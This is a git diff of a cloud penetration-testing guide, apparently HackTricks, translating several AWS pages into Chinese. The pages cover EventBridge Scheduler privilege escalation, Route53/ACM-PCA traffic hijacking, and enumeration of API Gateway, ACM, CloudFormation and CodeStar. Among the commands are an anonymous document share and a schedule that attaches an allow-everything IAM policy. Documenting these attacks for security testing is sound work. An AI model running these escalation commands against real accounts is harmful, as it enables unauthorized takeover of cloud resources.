aws workdocs add-resource-permissions --resource-id --principals Id=anonymous,Type=ANONYMOUS,Role=VIEWER ## This will give an id, the file will be acesible in: https://.awsapps.com/workdocs/index.html#/share/document/ ``` - ### `workdocs:AddUserToGroup` -You can make a user admin by setting it in the group ZOCALO_ADMIN.\ -For that follow the instructions from [https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_admin.html](https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_admin.html) - -Login with that user in workdoc and access the admin panel in `/workdocs/index.html#/admin` - -I didn't find any way to do this from the cli. - - +您可以通过将用户设置在组 ZOCALO_ADMIN 中来使其成为管理员。\ +为此,请按照 [https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_admin.html](https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_admin.html) 中的说明进行操作。 +使用该用户登录 workdoc,并在 `/workdocs/index.html#/admin` 中访问管理面板。 +我没有找到任何通过 CLI 执行此操作的方法。 diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md index 1519df70f..31f58fb61 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md @@ -4,7 +4,7 @@ ## EventBridge Scheduler -More info EventBridge Scheduler in: +更多信息关于 EventBridge Scheduler 在: {{#ref}} ../aws-services/eventbridgescheduler-enum.md @@ -12,42 +12,34 @@ More info EventBridge Scheduler in: ### `iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`) -An attacker with those permissions will be able to **`create`|`update` an scheduler and abuse the permissions of the scheduler role** attached to it to perform any action - -For example, they could configure the schedule to **invoke a Lambda function** which is a templated action: +拥有这些权限的攻击者将能够 **`创建`|`更新`一个调度程序并滥用附加到它的调度程序角色的权限** 来执行任何操作 +例如,他们可以配置调度以 **调用一个 Lambda 函数**,这是一个模板化的操作: ```bash aws scheduler create-schedule \ - --name MyLambdaSchedule \ - --schedule-expression "rate(5 minutes)" \ - --flexible-time-window "Mode=OFF" \ - --target '{ - "Arn": "arn:aws:lambda:::function:", - "RoleArn": "arn:aws:iam:::role/" - }' +--name MyLambdaSchedule \ +--schedule-expression "rate(5 minutes)" \ +--flexible-time-window "Mode=OFF" \ +--target '{ +"Arn": "arn:aws:lambda:::function:", +"RoleArn": "arn:aws:iam:::role/" +}' ``` - -In addition to templated service actions, you can use **universal targets** in EventBridge Scheduler to invoke a wide range of API operations for many AWS services. Universal targets offer flexibility to invoke almost any API. One example can be using universal targets adding "**AdminAccessPolicy**", using a role that has "**putRolePolicy**" policy: - +除了模板化的服务操作,您可以在 EventBridge Scheduler 中使用 **universal targets** 来调用许多 AWS 服务的广泛 API 操作。Universal targets 提供了灵活性,可以调用几乎任何 API。一个例子是使用 universal targets 添加 "**AdminAccessPolicy**",使用具有 "**putRolePolicy**" 策略的角色: ```bash aws scheduler create-schedule \ - --name GrantAdminToTargetRoleSchedule \ - --schedule-expression "rate(5 minutes)" \ - --flexible-time-window "Mode=OFF" \ - --target '{ - "Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy", - "RoleArn": "arn:aws:iam:::role/RoleWithPutPolicy", - "Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}" - }' +--name GrantAdminToTargetRoleSchedule \ +--schedule-expression "rate(5 minutes)" \ +--flexible-time-window "Mode=OFF" \ +--target '{ +"Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy", +"RoleArn": "arn:aws:iam:::role/RoleWithPutPolicy", +"Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}" +}' ``` - -## References +## 参考 - [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html) - [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md index fc3563ce7..4e8f2f1a0 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md @@ -2,7 +2,7 @@ {{#include ../../../banners/hacktricks-training.md}} -For more information about Route53 check: +有关Route53的更多信息,请查看: {{#ref}} ../aws-services/aws-route53-enum.md @@ -11,26 +11,22 @@ For more information about Route53 check: ### `route53:CreateHostedZone`, `route53:ChangeResourceRecordSets`, `acm-pca:IssueCertificate`, `acm-pca:GetCertificate` > [!NOTE] -> To perform this attack the target account must already have an [**AWS Certificate Manager Private Certificate Authority**](https://aws.amazon.com/certificate-manager/private-certificate-authority/) **(AWS-PCA)** setup in the account, and EC2 instances in the VPC(s) must have already imported the certificates to trust it. With this infrastructure in place, the following attack can be performed to intercept AWS API traffic. +> 要执行此攻击,目标账户必须已经在账户中设置了[**AWS证书管理器私有证书颁发机构**](https://aws.amazon.com/certificate-manager/private-certificate-authority/) **(AWS-PCA)**,并且VPC中的EC2实例必须已经导入证书以信任它。建立此基础设施后,可以执行以下攻击以拦截AWS API流量。 -Other permissions **recommend but not required for the enumeration** part: `route53:GetHostedZone`, `route53:ListHostedZones`, `acm-pca:ListCertificateAuthorities`, `ec2:DescribeVpcs` +其他权限**建议但不是枚举部分所必需的**:`route53:GetHostedZone`,`route53:ListHostedZones`,`acm-pca:ListCertificateAuthorities`,`ec2:DescribeVpcs` -Assuming there is an AWS VPC with multiple cloud-native applications talking to each other and to AWS API. Since the communication between the microservices is often TLS encrypted there must be a private CA to issue the valid certificates for those services. **If ACM-PCA is used** for that and the adversary manages to get **access to control both route53 and acm-pca private CA** with the minimum set of permissions described above, it can **hijack the application calls to AWS API** taking over their IAM permissions. +假设有一个AWS VPC,多个云原生应用程序相互通信并与AWS API通信。由于微服务之间的通信通常是TLS加密的,因此必须有一个私有CA来为这些服务颁发有效证书。**如果使用ACM-PCA**,并且对手设法获得**控制route53和acm-pca私有CA的访问权限**,并具备上述描述的最小权限集,则可以**劫持对AWS API的应用程序调用**,接管其IAM权限。 -This is possible because: +这是可能的,因为: -- AWS SDKs do not have [Certificate Pinning](https://www.digicert.com/blog/certificate-pinning-what-is-certificate-pinning) -- Route53 allows creating Private Hosted Zone and DNS records for AWS APIs domain names -- Private CA in ACM-PCA cannot be restricted to signing only certificates for specific Common Names +- AWS SDK不具有[证书钉扎](https://www.digicert.com/blog/certificate-pinning-what-is-certificate-pinning) +- Route53允许为AWS API域名创建私有托管区域和DNS记录 +- ACM-PCA中的私有CA不能限制仅为特定通用名称签署证书 -**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic. +**潜在影响:** 通过拦截流量中的敏感信息实现间接权限提升。 -#### Exploitation +#### 利用 -Find the exploitation steps in the original research: [**https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/**](https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/) +在原始研究中找到利用步骤:[**https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/**](https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/README.md b/src/pentesting-cloud/aws-security/aws-services/README.md index dddd8ac04..e65f9252e 100644 --- a/src/pentesting-cloud/aws-security/aws-services/README.md +++ b/src/pentesting-cloud/aws-security/aws-services/README.md @@ -1,35 +1,31 @@ -# AWS - Services +# AWS - 服务 {{#include ../../../banners/hacktricks-training.md}} -## Types of services +## 服务类型 -### Container services +### 容器服务 -Services that fall under container services have the following characteristics: +属于容器服务的服务具有以下特征: -- The service itself runs on **separate infrastructure instances**, such as EC2. -- **AWS** is responsible for **managing the operating system and the platform**. -- A managed service is provided by AWS, which is typically the service itself for the **actual application which are seen as containers**. -- As a user of these container services, you have a number of management and security responsibilities, including **managing network access security, such as network access control list rules and any firewalls**. -- Also, platform-level identity and access management where it exists. -- **Examples** of AWS container services include Relational Database Service, Elastic Mapreduce, and Elastic Beanstalk. +- 服务本身运行在 **独立的基础设施实例** 上,例如 EC2。 +- **AWS** 负责 **管理操作系统和平台**。 +- AWS 提供的托管服务,通常是 **被视为容器的实际应用服务**。 +- 作为这些容器服务的用户,您有许多管理和安全责任,包括 **管理网络访问安全,例如网络访问控制列表规则和任何防火墙**。 +- 另外,平台级身份和访问管理(如果存在)。 +- **AWS** 容器服务的 **示例** 包括关系数据库服务、弹性 Mapreduce 和弹性 Beanstalk。 -### Abstract Services +### 抽象服务 -- These services are **removed, abstracted, from the platform or management layer which cloud applications are built on**. -- The services are accessed via endpoints using AWS application programming interfaces, APIs. -- The **underlying infrastructure, operating system, and platform is managed by AWS**. -- The abstracted services provide a multi-tenancy platform on which the underlying infrastructure is shared. -- **Data is isolated via security mechanisms**. -- Abstract services have a strong integration with IAM, and **examples** of abstract services include S3, DynamoDB, Amazon Glacier, and SQS. +- 这些服务是 **从构建云应用程序的平台或管理层中移除、抽象出来的**。 +- 通过使用 AWS 应用程序编程接口(API)的端点访问这些服务。 +- **基础设施、操作系统和平台由 AWS 管理**。 +- 抽象服务提供一个多租户平台,基础设施在其上共享。 +- **数据通过安全机制隔离**。 +- 抽象服务与 IAM 有强集成,**抽象服务的示例** 包括 S3、DynamoDB、Amazon Glacier 和 SQS。 -## Services Enumeration +## 服务枚举 -**The pages of this section are ordered by AWS service. In there you will be able to find information about the service (how it works and capabilities) and that will allow you to escalate privileges.** +**本节的页面按 AWS 服务排序。在这里您将能够找到有关服务的信息(如何工作和功能),这将允许您提升权限。** {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md index 09aa42d7c..78c62e8f8 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md @@ -4,40 +4,39 @@ ## API Gateway -### Basic Information +### 基本信息 -AWS API Gateway is a comprehensive service offered by Amazon Web Services (AWS) designed for developers to **create, publish, and oversee APIs on a large scale**. It functions as an entry point to an application, permitting developers to establish a framework of rules and procedures. This framework governs the access external users have to certain data or functionalities within the application. +AWS API Gateway 是亚马逊网络服务(AWS)提供的一项综合服务,旨在帮助开发者**大规模创建、发布和管理 API**。它作为应用程序的入口点,允许开发者建立一套规则和程序框架。该框架管理外部用户对应用程序中特定数据或功能的访问。 -API Gateway enables you to define **how requests to your APIs should be handled**, and it can create custom API endpoints with specific methods (e.g., GET, POST, PUT, DELETE) and resources. It can also generate client SDKs (Software Development Kits) to make it easier for developers to call your APIs from their applications. +API Gateway 使您能够定义**如何处理对您的 API 的请求**,并可以创建具有特定方法(例如 GET、POST、PUT、DELETE)和资源的自定义 API 端点。它还可以生成客户端 SDK(软件开发工具包),以便开发者更轻松地从他们的应用程序调用您的 API。 -### API Gateways Types +### API 网关类型 -- **HTTP API**: Build low-latency and cost-effective REST APIs with built-in features such as OIDC and OAuth2, and native CORS support. Works with the following: Lambda, HTTP backends. -- **WebSocket API**: Build a WebSocket API using persistent connections for real-time use cases such as chat applications or dashboards. Works with the following: Lambda, HTTP, AWS Services. -- **REST API**: Develop a REST API where you gain complete control over the request and response along with API management capabilities. Works with the following: Lambda, HTTP, AWS Services. -- **REST API Private**: Create a REST API that is only accessible from within a VPC. +- **HTTP API**:构建低延迟和成本效益高的 REST API,具有内置功能,如 OIDC 和 OAuth2,以及原生 CORS 支持。与以下内容兼容:Lambda、HTTP 后端。 +- **WebSocket API**:使用持久连接构建 WebSocket API,适用于实时用例,如聊天应用程序或仪表板。与以下内容兼容:Lambda、HTTP、AWS 服务。 +- **REST API**:开发 REST API,您可以完全控制请求和响应以及 API 管理功能。与以下内容兼容:Lambda、HTTP、AWS 服务。 +- **REST API 私有**:创建仅可从 VPC 内部访问的 REST API。 -### API Gateway Main Components +### API Gateway 主要组件 -1. **Resources**: In API Gateway, resources are the components that **make up the structure of your API**. They represent **the different paths or endpoints** of your API and correspond to the various actions that your API supports. A resource is each method (e.g., GET, POST, PUT, DELETE) **inside each path** (/, or /users, or /user/{id}. -2. **Stages**: Stages in API Gateway represent **different versions or environments** of your API, such as development, staging, or production. You can use stages to manage and deploy **multiple versions of your API simultaneousl**y, allowing you to test new features or bug fixes without affecting the production environment. Stages also **support stage variables**, which are key-value pairs that can be used to configure the behavior of your API based on the current stage. For example, you could use stage variables to direct API requests to different Lambda functions or other backend services depending on the stage. - - The stage is indicated at the beggining of the URL of the API Gateway endpoint. -3. **Authorizers**: Authorizers in API Gateway are responsible for **controlling access to your API** by verifying the identity of the caller before allowing the request to proceed. You can use **AWS Lambda functions** as custom authorizers, which allows you to implement your own authentication and authorization logic. When a request comes in, API Gateway passes the request's authorization token to the Lambda authorizer, which processes the token and returns an IAM policy that determines what actions the caller is allowed to perform. API Gateway also supports **built-in authorizers**, such as **AWS Identity and Access Management (IAM)** and **Amazon Cognito**. -4. **Resource Policy**: A resource policy in API Gateway is a JSON document that **defines the permissions for accessing your API**. It is similar to an IAM policy but specifically tailored for API Gateway. You can use a resource policy to control who can access your API, which methods they can call, and from which IP addresses or VPCs they can connect. **Resource policies can be used in combination with authorizers** to provide fine-grained access control for your API. - - In order to make effect the API needs to be **deployed again after** the resource policy is modified. +1. **资源**:在 API Gateway 中,资源是**构成您 API 结构的组件**。它们代表**您 API 的不同路径或端点**,并对应于您的 API 支持的各种操作。资源是每个路径(/、/users 或 /user/{id})**内的每个方法**(例如 GET、POST、PUT、DELETE)。 +2. **阶段**:API Gateway 中的阶段代表您 API 的**不同版本或环境**,例如开发、预发布或生产。您可以使用阶段来管理和部署**多个版本的 API 同时**,允许您在不影响生产环境的情况下测试新功能或修复错误。阶段还**支持阶段变量**,这些是可以根据当前阶段配置 API 行为的键值对。例如,您可以使用阶段变量根据阶段将 API 请求定向到不同的 Lambda 函数或其他后端服务。 +- 阶段在 API Gateway 端点的 URL 开头指示。 +3. **授权者**:API Gateway 中的授权者负责**控制对您 API 的访问**,通过在允许请求继续之前验证调用者的身份。您可以使用**AWS Lambda 函数**作为自定义授权者,这使您能够实现自己的身份验证和授权逻辑。当请求到达时,API Gateway 将请求的授权令牌传递给 Lambda 授权者,后者处理该令牌并返回一个 IAM 策略,确定调用者被允许执行的操作。API Gateway 还支持**内置授权者**,如**AWS 身份与访问管理(IAM)**和**亚马逊 Cognito**。 +4. **资源策略**:API Gateway 中的资源策略是一个 JSON 文档,**定义访问您 API 的权限**。它类似于 IAM 策略,但专门为 API Gateway 定制。您可以使用资源策略来控制谁可以访问您的 API,他们可以调用哪些方法,以及他们可以从哪些 IP 地址或 VPC 连接。**资源策略可以与授权者结合使用**,为您的 API 提供细粒度的访问控制。 +- 为了使效果生效,API 需要在**修改资源策略后重新部署**。 -### Logging +### 日志记录 -By default, **CloudWatch Logs** are **off**, **Access Logging** is **off**, and **X-Ray tracing** is also **off**. +默认情况下,**CloudWatch 日志**是**关闭的**,**访问日志**是**关闭的**,**X-Ray 跟踪**也是**关闭的**。 -### Enumeration +### 枚举 > [!TIP] -> Note that in both AWS apis to enumerate resources (**`apigateway`** and **`apigatewayv2`**) the only permission you need and the only read permission grantable is **`apigateway:GET`**, with that you can **enumerate everything.** +> 请注意,在两个 AWS API 中枚举资源(**`apigateway`** 和 **`apigatewayv2`**)时,您所需的唯一权限和唯一可授予的读取权限是**`apigateway:GET`**,通过此权限您可以**枚举所有内容**。 {{#tabs }} {{#tab name="apigateway" }} - ```bash # Generic info aws apigateway get-account @@ -78,11 +77,9 @@ aws apigateway get-usage-plan-key --usage-plan-id --key-id ###Already consumed aws apigateway get-usage --usage-plan-id --start-date 2023-07-01 --end-date 2023-07-12 ``` - {{#endtab }} {{#tab name="apigatewayv2" }} - ```bash # Generic info aws apigatewayv2 get-domain-names @@ -124,49 +121,43 @@ aws apigatewayv2 get-models --api-id ## Call API https://.execute-api..amazonaws.com// ``` - {{#endtab }} {{#endtabs }} -## Different Authorizations to access API Gateway endpoints +## 访问 API Gateway 端点的不同授权 -### Resource Policy +### 资源策略 -It's possible to use resource policies to define who could call the API endpoints.\ -In the following example you can see that the **indicated IP cannot call** the endpoint `/resource_policy` via GET. +可以使用资源策略来定义谁可以调用 API 端点。\ +在以下示例中,您可以看到 **指示的 IP 无法通过 GET 调用** 端点 `/resource_policy`。
-### IAM Authorizer +### IAM 授权者 -It's possible to set that a methods inside a path (a resource) requires IAM authentication to call it. +可以设置路径(资源)中的方法需要 IAM 身份验证才能调用。
-When this is set you will receive the error `{"message":"Missing Authentication Token"}` when you try to reach the endpoint without any authorization. - -One easy way to generate the expected token by the application is to use **curl**. +设置后,当您尝试在没有任何授权的情况下访问端点时,将收到错误 `{"message":"Missing Authentication Token"}`。 +生成应用程序所需的预期令牌的一种简单方法是使用 **curl**。 ```bash $ curl -X https://.execute-api..amazonaws.com// --user : --aws-sigv4 "aws:amz::execute-api" ``` - -Another way is to use the **`Authorization`** type **`AWS Signature`** inside **Postman**. +另一种方法是在 **Postman** 中使用 **`Authorization`** 类型 **`AWS Signature`**。
-Set the accessKey and the SecretKey of the account you want to use and you can know authenticate against the API endpoint. - -Both methods will generate an **Authorization** **header** such as: +设置您要使用的帐户的 accessKey 和 SecretKey,您就可以对 API 端点进行身份验证。 +这两种方法都会生成一个 **Authorization** **header**,例如: ``` AWS4-HMAC-SHA256 Credential=AKIAYY7XU6ECUDOTWB7W/20220726/us-east-1/execute-api/aws4_request, SignedHeaders=host;x-amz-date, Signature=9f35579fa85c0d089c5a939e3d711362e92641e8c14cc571df8c71b4bc62a5c2 ``` +注意,在其他情况下,**Authorizer** 可能被 **错误编码**,只需在 **Authorization header** 中发送 **任何内容** 就会 **允许查看隐藏内容**。 -Note that in other cases the **Authorizer** might have been **bad coded** and just sending **anything** inside the **Authorization header** will **allow to see the hidden content**. - -### Request Signing Using Python - +### 使用 Python 进行请求签名 ```python pip install requests @@ -193,111 +184,104 @@ response = requests.get(url, auth=awsauth) print(response.text) ``` +### 自定义 Lambda 授权器 -### Custom Lambda Authorizer - -It's possible to use a lambda that based in a given token will **return an IAM policy** indicating if the user is **authorized to call the API endpoint**.\ -You can set each resource method that will be using the authoriser. +可以使用一个基于给定令牌的 lambda,**返回一个 IAM 策略**,指示用户是否**有权调用 API 端点**。\ +您可以设置将使用授权器的每个资源方法。
-Lambda Authorizer Code Example - +Lambda 授权器代码示例 ```python import json def lambda_handler(event, context): - token = event['authorizationToken'] - method_arn = event['methodArn'] +token = event['authorizationToken'] +method_arn = event['methodArn'] - if not token: - return { - 'statusCode': 401, - 'body': 'Unauthorized' - } +if not token: +return { +'statusCode': 401, +'body': 'Unauthorized' +} - try: - # Replace this with your own token validation logic - if token == "your-secret-token": - return generate_policy('user', 'Allow', method_arn) - else: - return generate_policy('user', 'Deny', method_arn) - except Exception as e: - print(e) - return { - 'statusCode': 500, - 'body': 'Internal Server Error' - } +try: +# Replace this with your own token validation logic +if token == "your-secret-token": +return generate_policy('user', 'Allow', method_arn) +else: +return generate_policy('user', 'Deny', method_arn) +except Exception as e: +print(e) +return { +'statusCode': 500, +'body': 'Internal Server Error' +} def generate_policy(principal_id, effect, resource): - policy = { - 'principalId': principal_id, - 'policyDocument': { - 'Version': '2012-10-17', - 'Statement': [ - { - 'Action': 'execute-api:Invoke', - 'Effect': effect, - 'Resource': resource - } - ] - } - } - return policy +policy = { +'principalId': principal_id, +'policyDocument': { +'Version': '2012-10-17', +'Statement': [ +{ +'Action': 'execute-api:Invoke', +'Effect': effect, +'Resource': resource +} +] +} +} +return policy ``` -
-Call it with something like: +用类似下面的方式调用它:
curl "https://jhhqafgh6f.execute-api.eu-west-1.amazonaws.com/prod/custom_auth" -H 'Authorization: your-secret-token'
 
> [!WARNING] -> Depending on the Lambda code, this authorization might be vulnerable +> 根据Lambda代码,这个授权可能存在漏洞 -Note that if a **deny policy is generated and returned** the error returned by API Gateway is: `{"Message":"User is not authorized to access this resource with an explicit deny"}` +请注意,如果生成并返回了**拒绝策略**,API Gateway返回的错误是:`{"Message":"User is not authorized to access this resource with an explicit deny"}` -This way you could **identify this authorization** being in place. +通过这种方式,您可以**识别此授权**的存在。 -### Required API Key +### 所需的API密钥 -It's possible to set API endpoints that **require a valid API key** to contact it. +可以设置需要**有效API密钥**才能联系的API端点。
-It's possible to generate API keys in the API Gateway portal and even set how much it can be used (in terms of requests per second and in terms of requests per month). +可以在API Gateway门户中生成API密钥,甚至可以设置其使用量(每秒请求数和每月请求数)。 -To make an API key work, you need to add it to a **Usage Plan**, this usage plan mus be added to the **API Stage** and the associated API stage needs to have a configured a **method throttling** to the **endpoint** requiring the API key: +要使API密钥生效,您需要将其添加到**使用计划**中,该使用计划必须添加到**API阶段**,并且相关的API阶段需要为需要API密钥的**端点**配置**方法限流**:
-## Unauthenticated Access +## 未经身份验证的访问 {{#ref}} ../aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md {{#endref}} -## Privesc +## 权限提升 {{#ref}} ../aws-privilege-escalation/aws-apigateway-privesc.md {{#endref}} -## Post Exploitation +## 后期利用 {{#ref}} ../aws-post-exploitation/aws-api-gateway-post-exploitation.md {{#endref}} -## Persistence +## 持久性 {{#ref}} ../aws-persistence/aws-api-gateway-persistence.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md b/src/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md index 0f3da9d50..d258685f1 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md @@ -1,19 +1,18 @@ -# AWS - Certificate Manager (ACM) & Private Certificate Authority (PCA) +# AWS - 证书管理器 (ACM) & 私有证书授权机构 (PCA) {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -**AWS Certificate Manager (ACM)** is provided as a service aimed at streamlining the **provisioning, management, and deployment of SSL/TLS certificates** for AWS services and internal resources. The necessity for manual processes, such as purchasing, uploading, and certificate renewals, is **eliminated** by ACM. This allows users to efficiently request and implement certificates on various AWS resources including **Elastic Load Balancers, Amazon CloudFront distributions, and APIs on API Gateway**. +**AWS 证书管理器 (ACM)** 是一项旨在简化 **SSL/TLS 证书的提供、管理和部署** 的服务,适用于 AWS 服务和内部资源。ACM **消除了** 手动流程的必要性,例如购买、上传和证书续订。这使得用户能够高效地请求和实施证书,适用于各种 AWS 资源,包括 **弹性负载均衡器、Amazon CloudFront 分发和 API 网关上的 API**。 -A key feature of ACM is the **automatic renewal of certificates**, significantly reducing the management overhead. Furthermore, ACM supports the creation and centralized management of **private certificates for internal use**. Although SSL/TLS certificates for integrated AWS services like Elastic Load Balancing, Amazon CloudFront, and Amazon API Gateway are provided at no extra cost through ACM, users are responsible for the costs associated with the AWS resources utilized by their applications and a monthly fee for each **private Certificate Authority (CA)** and private certificates used outside integrated ACM services. +ACM 的一个关键特性是 **证书的自动续订**,显著减少了管理开销。此外,ACM 支持创建和集中管理 **用于内部使用的私有证书**。尽管通过 ACM 提供的集成 AWS 服务(如弹性负载均衡、Amazon CloudFront 和 Amazon API 网关)的 SSL/TLS 证书没有额外费用,但用户需承担其应用程序所使用的 AWS 资源相关费用,以及每个 **私有证书授权机构 (CA)** 和在集成 ACM 服务之外使用的私有证书的月费。 -**AWS Private Certificate Authority** is offered as a **managed private CA service**, enhancing ACM's capabilities by extending certificate management to include private certificates. These private certificates are instrumental in authenticating resources within an organization. +**AWS 私有证书授权机构** 作为 **托管私有 CA 服务** 提供,增强了 ACM 的功能,将证书管理扩展到包括私有证书。这些私有证书在组织内部资源的身份验证中发挥着重要作用。 -## Enumeration +## 枚举 ### ACM - ```bash # List certificates aws acm list-certificates @@ -27,9 +26,7 @@ aws acm get-certificate --certificate-arn "arn:aws:acm:us-east-1:188868097724:ce # Account configuration aws acm get-account-configuration ``` - ### PCM - ```bash # List CAs aws acm-pca list-certificate-authorities @@ -49,7 +46,6 @@ aws acm-pca get-certificate-authority-csr --certificate-authority-arn # Get CA Policy (if any) aws acm-pca get-policy --resource-arn ``` - ## Privesc TODO @@ -59,7 +55,3 @@ TODO TODO {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md index 66539b87d..c95f37ef1 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md @@ -4,10 +4,9 @@ ## CloudFormation -AWS CloudFormation is a service designed to **streamline the management of AWS resources**. It enables users to focus more on their applications running in AWS by **minimizing the time spent on resource management**. The core feature of this service is the **template**—a descriptive model of the desired AWS resources. Once this template is provided, CloudFormation is responsible for the **provisioning and configuration** of the specified resources. This automation facilitates a more efficient and error-free management of AWS infrastructure. +AWS CloudFormation 是一项旨在 **简化 AWS 资源管理** 的服务。它使用户能够更多地关注在 AWS 上运行的应用程序,通过 **减少在资源管理上花费的时间**。该服务的核心功能是 **模板**——所需 AWS 资源的描述模型。一旦提供了该模板,CloudFormation 负责 **指定资源的供应和配置**。这种自动化促进了更高效和无错误的 AWS 基础设施管理。 ### Enumeration - ```bash # Stacks aws cloudformation list-stacks @@ -30,10 +29,9 @@ aws cloudformation list-stack-instances --stack-set-name aws cloudformation list-stack-set-operations --stack-set-name aws cloudformation list-stack-set-operation-results --stack-set-name --operation-id ``` - ### Privesc -In the following page you can check how to **abuse cloudformation permissions to escalate privileges**: +在以下页面中,您可以查看如何**滥用cloudformation权限以提升特权**: {{#ref}} ../aws-privilege-escalation/aws-cloudformation-privesc/ @@ -41,14 +39,13 @@ In the following page you can check how to **abuse cloudformation permissions to ### Post-Exploitation -Check for **secrets** or sensitive information in the **template, parameters & output** of each CloudFormation +检查每个CloudFormation的**模板、参数和输出**中的**秘密**或敏感信息 ## Codestar -AWS CodeStar is a service for creating, managing, and working with software development projects on AWS. You can quickly develop, build, and deploy applications on AWS with an AWS CodeStar project. An AWS CodeStar project creates and **integrates AWS services** for your project development toolchain. Depending on your choice of AWS CodeStar project template, that toolchain might include source control, build, deployment, virtual servers or serverless resources, and more. AWS CodeStar also **manages the permissions required for project users** (called team members). +AWS CodeStar是一个用于在AWS上创建、管理和处理软件开发项目的服务。您可以通过AWS CodeStar项目快速开发、构建和部署应用程序。AWS CodeStar项目为您的项目开发工具链创建并**集成AWS服务**。根据您选择的AWS CodeStar项目模板,该工具链可能包括源代码控制、构建、部署、虚拟服务器或无服务器资源等。AWS CodeStar还**管理项目用户**(称为团队成员)所需的权限。 ### Enumeration - ```bash # Get projects information aws codestar list-projects @@ -56,13 +53,12 @@ aws codestar describe-project --id aws codestar list-resources --project-id aws codestar list-team-members --project-id - aws codestar list-user-profiles - aws codestar describe-user-profile --user-arn +aws codestar list-user-profiles +aws codestar describe-user-profile --user-arn ``` - ### Privesc -In the following page you can check how to **abuse codestar permissions to escalate privileges**: +在以下页面中,您可以查看如何**滥用codestar权限以提升特权**: {{#ref}} ../aws-privilege-escalation/aws-codestar-privesc/ @@ -73,7 +69,3 @@ In the following page you can check how to **abuse codestar permissions to escal - [https://docs.aws.amazon.com/cloudformation/](https://docs.aws.amazon.com/cloudformation/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md index 75613cdb4..8b134e7cd 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md @@ -4,20 +4,19 @@ ## CloudFront -CloudFront is AWS's **content delivery network that speeds up distribution** of your static and dynamic content through its worldwide network of edge locations. When you use a request content that you're hosting through Amazon CloudFront, the request is routed to the closest edge location which provides it the lowest latency to deliver the best performance. When **CloudFront access logs** are enabled you can record the request from each user requesting access to your website and distribution. As with S3 access logs, these logs are also **stored on Amazon S3 for durable and persistent storage**. There are no charges for enabling logging itself, however, as the logs are stored in S3 you will be stored for the storage used by S3. +CloudFront 是 AWS 的 **内容分发网络,能够加速** 